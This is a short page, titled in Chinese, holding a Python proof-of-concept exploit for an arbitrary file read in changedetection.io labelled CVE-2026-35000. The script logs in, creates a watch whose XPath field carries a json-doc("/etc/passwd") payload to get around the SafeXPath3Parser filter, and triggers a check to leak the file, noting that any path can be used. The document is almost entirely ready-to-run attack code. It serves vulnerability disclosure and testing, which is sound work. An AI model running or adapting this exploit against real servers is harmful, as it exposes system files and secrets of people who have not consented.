CVE-2026-35000 changedetection.io任意文件读取漏洞

# PoC for CVE-2026-35000: changedetection.io Arbitrary File Read # Description: This script demonstrates how to bypass SafeXPath3Parser # using the json-doc() function to read local files. import requests import json # Configuration TARGET_URL = "http://localhost:5000" USERNAME = "admin" PASSWORD = "password" # Login to get session session = requests.Session() login_payload = {"username": USERNAME, "password": PASSWORD} session.post(f"{TARGET_URL}/login", data=login_payload) # The malicious XPath payload using json-doc() to read /etc/passwd # Note: The file path can be changed to any file on the system malicious_xpath = 'json-doc("/etc/passwd")' # Prepare the watch request with the malicious XPath watch_data = { "url": "http://example.com", # A valid URL to monitor "title": "PoC Test", "xpath": malicious_xpath } # Send the request to create/update a watch headers = {"Content-Type": "application/json"} response = session.post(f"{TARGET_URL}/api/v1/watch/add", data=json.dumps(watch_data), headers=headers) if response.status_code == 200: print("[+] Watch created/updated successfully. Triggering a check...") # Trigger a check immediately to execute the XPath check_resp = session.get(f"{TARGET_URL}/api/v1/watch/{json.loads(response.text)['uuid']}/checknow") print("[+] Check triggered. Inspect the watch result page or logs for file content.") else: print("[-] Failed to create watch.") print(response.text)